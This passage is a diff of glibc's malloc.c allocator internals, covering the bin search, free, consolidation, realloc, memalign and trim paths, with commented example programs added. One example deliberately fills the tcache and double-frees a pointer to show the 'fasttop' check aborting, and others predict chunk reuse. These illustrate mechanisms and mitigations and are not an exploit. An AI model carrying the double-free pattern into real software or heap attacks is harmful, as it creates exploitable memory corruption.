+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
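+
+      /*
+         Hedged illustration of the best-fit scan (a user-level sketch,
+         not authoritative; assumes a 64-bit build, default tunables and
+         no other heap activity).  Two freed chunks of 0x600 and 0x500
+         bytes are sorted into their large bins by an intervening bigger
+         request; a following request that both could satisfy is served
+         from the smaller one:
+
+           #include <stdio.h>
+           #include <stdlib.h>
+           int main (void)
+           {
+             void *big   = malloc (0x5f8);  // 0x600-byte chunk
+             void *gap1  = malloc (0x18);   // stop consolidation
+             void *small = malloc (0x4f8);  // 0x500-byte chunk
+             void *gap2  = malloc (0x18);   // keep small off the top
+             free (big);
+             free (small);
+             (void) malloc (0x800);         // sorts both into large bins
+             void *fit = malloc (0x4e8);    // best fit: expect the 0x500 chunk
+             printf ("small=%p fit=%p (%s)\n", small, fit,
+                     fit == small ? "best fit reused" : "different chunk");
+             return 0;
+           }
+       */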
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks 2");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (atomic_load_relaxed (&av->have_fastchunks))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
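+
+/* Hedged user-level illustration of the thread-cache reuse referenced
+   above (tcache_put / tcache_get; a sketch, not authoritative): a block
+   just freed at a cacheable size is normally the first thing handed back
+   for the next request of that size.  Assumes a tcache-enabled build
+   (USE_TCACHE) with default tunables:
+
+     #include <stdio.h>
+     #include <stdlib.h>
+     int main (void)
+     {
+       void *p = malloc (0x100);
+       free (p);
+       void *q = malloc (0x100);
+       printf ("%s\n", p == q ? "reused" : "not reused");
+       return 0;
+     }
+
+   The API gives no such guarantee; other heap traffic, a full tcache bin
+   or a no-tcache build can all change the result.  */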
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wraps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    malloc_printerr ("free(): invalid pointer");
+  /* We know that each chunk is at least MINSIZE bytes in size and a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    malloc_printerr ("free(): invalid size");
+
+  check_inuse_chunk(av, p);
+
+#if USE_TCACHE
+  {
+    size_t tc_idx = csize2tidx (size);
+
+    if (tcache
+	&& tc_idx < mp_.tcache_bins
+	&& tcache->counts[tc_idx] < mp_.tcache_count)
+      {
+	tcache_put (p, tc_idx);
+	return;
+      }
+  }
+#endif
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	bool fail = true;
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might result in a false positive.  Redo the test after
+	   getting the lock.  */
+	if (!have_lock)
+	  {
+	    __libc_lock_lock (av->mutex);
+	    fail = (chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem);
+	    __libc_lock_unlock (av->mutex);
+	  }
+
+	if (fail)
+	  malloc_printerr ("free(): invalid next size (fast)");
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    atomic_store_relaxed (&av->have_fastchunks, true);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+
+    if (SINGLE_THREAD_P)
+      {
+	/* Check that the top of the bin is not the record we are going to
+	   add (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  malloc_printerr ("double free or corruption (fasttop)");
+	p->fd = old;
+	*fb = p;
+      }
+    else
+      do
+	{
+	  /* Check that the top of the bin is not the record we are going to
+	     add (i.e., double free).  */
+	  if (__builtin_expect (old == p, 0))
+	    malloc_printerr ("double free or corruption (fasttop)");
+	  p->fd = old2 = old;
+	}
+      while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
+	     != old2);
+
+    /* Check that size of fastbin chunk at the top is the same as
+       size of the chunk that we are adding.  We can dereference OLD
+       only if we have the lock, otherwise it might have already been
+       allocated again.  */
+    if (have_lock && old != NULL
+	&& __builtin_expect (fastbin_index (chunksize (old)) != idx, 0))
+      malloc_printerr ("invalid fastbin entry (free)");
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+
+    /* If we're single-threaded, don't lock the arena.  */
+    if (SINGLE_THREAD_P)
+      have_lock = true;
+
+    if (!have_lock)
+      __libc_lock_lock (av->mutex);
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      malloc_printerr ("double free or corruption (top)");
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+	malloc_printerr ("double free or corruption (out)");
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      malloc_printerr ("double free or corruption (!prev)");
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      malloc_printerr ("free(): invalid next size (normal)");
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      unlink(av, p, bck, fwd);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink(av, nextchunk, bck, fwd);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	malloc_printerr ("free(): corrupted unsorted chunks");
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (atomic_load_relaxed (&av->have_fastchunks))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (!have_lock)
+      __libc_lock_unlock (av->mutex);
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
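+
+/* Hedged illustration of the "fasttop" double-free check above (a sketch
+   only; exact behaviour differs across glibc versions and tcache
+   configuration).  On a tcache build the per-size cache must be filled
+   first so that the second free of P reaches the fastbin path:
+
+     #include <stdlib.h>
+     int main (void)
+     {
+       void *spray[7];
+       for (int i = 0; i < 7; i++)        // fill the 0x20 tcache bin
+         spray[i] = malloc (0x18);
+       void *p = malloc (0x18);
+       for (int i = 0; i < 7; i++)
+         free (spray[i]);
+       free (p);                          // goes to the fastbin
+       free (p);                          // expected abort:
+                                          // "double free or corruption (fasttop)"
+       return 0;
+     }
+*/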
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+  mchunkptr       bck;
+  mchunkptr       fwd;
+
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  unsorted_bin = unsorted_chunks(av);
+
+  /*
+    Remove each chunk from fast bin and consolidate it, placing it
+    then in unsorted bin. Among other reasons for doing this,
+    placing in unsorted bin avoids needing to calculate actual bins
+    until malloc is sure that chunks aren't immediately going to be
+    reused anyway.
+  */
+
+  maxfb = &fastbin (av, NFASTBINS - 1);
+  fb = &fastbin (av, 0);
+  do {
+    p = atomic_exchange_acq (fb, NULL);
+    if (p != 0) {
+      do {
+	{
+	  unsigned int idx = fastbin_index (chunksize (p));
+	  if ((&fastbin (av, idx)) != fb)
+	    malloc_printerr ("malloc_consolidate(): invalid chunk size");
+	}
+
+	check_inuse_chunk(av, p);
+	nextp = p->fd;
+
+	/* Slightly streamlined version of consolidation code in free() */
+	size = chunksize (p);
+	nextchunk = chunk_at_offset(p, size);
+	nextsize = chunksize(nextchunk);
+
+	if (!prev_inuse(p)) {
+	  prevsize = prev_size (p);
+	  size += prevsize;
+	  p = chunk_at_offset(p, -((long) prevsize));
+	  unlink(av, p, bck, fwd);
+	}
+
+	if (nextchunk != av->top) {
+	  nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	  if (!nextinuse) {
+	    size += nextsize;
+	    unlink(av, nextchunk, bck, fwd);
+	  } else
+	    clear_inuse_bit_at_offset(nextchunk, 0);
+
+	  first_unsorted = unsorted_bin->fd;
+	  unsorted_bin->fd = p;
+	  first_unsorted->bk = p;
+
+	  if (!in_smallbin_range (size)) {
+	    p->fd_nextsize = NULL;
+	    p->bk_nextsize = NULL;
+	  }
+
+	  set_head(p, size | PREV_INUSE);
+	  p->bk = unsorted_bin;
+	  p->fd = first_unsorted;
+	  set_foot(p, size);
+	}
+
+	else {
+	  size += nextsize;
+	  set_head(p, size | PREV_INUSE);
+	  av->top = p;
+	}
+
+      } while ( (p = nextp) != 0);
+
+    }
+  } while (fb++ != maxfb);
+}
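+
+/* Hedged observation sketch: fastbin chunks linger until something calls
+   malloc_consolidate -- a free of a large block, an allocation that
+   cannot otherwise be satisfied, mallopt, or malloc_trim (whose mtrim
+   helper below consolidates explicitly).  malloc_info(3) can be used to
+   watch the cached chunks disappear (output format is glibc-specific):
+
+     #include <malloc.h>
+     #include <stdio.h>
+     #include <stdlib.h>
+     int main (void)
+     {
+       void *p[32];
+       for (int i = 0; i < 32; i++) p[i] = malloc (0x30);
+       for (int i = 0; i < 32; i++) free (p[i]);
+       malloc_info (0, stdout);   // chunks sit in tcache/fastbins
+       malloc_trim (0);           // consolidates fastbins first
+       malloc_info (0, stdout);   // fast-bin totals should now be empty
+       return 0;
+     }
+*/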
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  mchunkptr        bck;             /* misc temp for linking */
+  mchunkptr        fwd;             /* misc temp for linking */
+
+  unsigned long    copysize;        /* bytes to copy */
+  unsigned int     ncopies;         /* INTERNAL_SIZE_T words to copy */
+  INTERNAL_SIZE_T* s;               /* copy source */
+  INTERNAL_SIZE_T* d;               /* copy destination */
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid old size");
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid next size");
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink (av, next, bck, fwd);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+              /*
+                 Unroll copy of <= 36 bytes (72 if 8byte sizes)
+                 We know that contents have an odd number of
+                 INTERNAL_SIZE_T-sized words; minimally 3.
+               */
+
+              copysize = oldsize - SIZE_SZ;
+              s = (INTERNAL_SIZE_T *) (chunk2mem (oldp));
+              d = (INTERNAL_SIZE_T *) (newmem);
+              ncopies = copysize / sizeof (INTERNAL_SIZE_T);
+              assert (ncopies >= 3);
+
+              if (ncopies > 9)
+                memcpy (d, s, copysize);
+
+              else
+                {
+                  *(d + 0) = *(s + 0);
+                  *(d + 1) = *(s + 1);
+                  *(d + 2) = *(s + 2);
+                  if (ncopies > 4)
+                    {
+                      *(d + 3) = *(s + 3);
+                      *(d + 4) = *(s + 4);
+                      if (ncopies > 6)
+                        {
+                          *(d + 5) = *(s + 5);
+                          *(d + 6) = *(s + 6);
+                          if (ncopies > 8)
+                            {
+                              *(d + 7) = *(s + 7);
+                              *(d + 8) = *(s + 8);
+                            }
+                        }
+                    }
+                }
+
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
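+
+/* Hedged usage sketch of the cases above (already big enough, grow into
+   top, absorb a free neighbour, or allocate-copy-free).  From user code
+   the only visible difference is whether the pointer moved; the contents
+   up to the old size are preserved either way:
+
+     #include <stdio.h>
+     #include <stdlib.h>
+     #include <string.h>
+     int main (void)
+     {
+       char *p = malloc (64);
+       strcpy (p, "hello");
+       char *q = realloc (p, 4096);
+       // comparing against the old pointer value is for illustration only
+       printf ("%s: %s\n", q == p ? "resized in place" : "moved", q);
+       free (q);
+       return 0;
+     }
+*/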
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  checked_request2size (bytes, nb);
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+
+  /* Check for overflow.  */
+  if (nb > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    {
+      /* Find an aligned spot inside chunk.  Since we need to give back
+         leading space in a chunk of at least MINSIZE, if the first
+         calculation places us at a spot with less than MINSIZE leader,
+         we can move to the next aligned spot -- we've allocated enough
+         total room so that this is always possible.  */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
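+
+/* Hedged usage sketch: the public wrappers (memalign, aligned_alloc,
+   posix_memalign, valloc, pvalloc) funnel into this routine; the result
+   can be freed normally.  Checking the alignment from user code:
+
+     #include <malloc.h>
+     #include <stdint.h>
+     #include <stdio.h>
+     #include <stdlib.h>
+     int main (void)
+     {
+       void *p = memalign (0x1000, 123);   // 4 KiB alignment
+       printf ("%p low bits: %#lx\n", p,
+               (unsigned long) ((uintptr_t) p & 0xfff));
+       free (p);
+       return 0;
+     }
+*/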
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Ensure all blocks are consolidated.  */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
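+
+/* Hedged usage sketch: after a burst of heap usage an application can
+   ask for unused pages back.  A non-zero return means some memory was
+   released; 0 is also normal, e.g. when free() already trimmed the top
+   chunk on its own:
+
+     #include <malloc.h>
+     #include <stdio.h>
+     #include <stdlib.h>
+     int main (void)
+     {
+       void *p[64];
+       for (int i = 0; i < 64; i++)
+         p[i] = malloc (64 * 1024);        // below the mmap threshold
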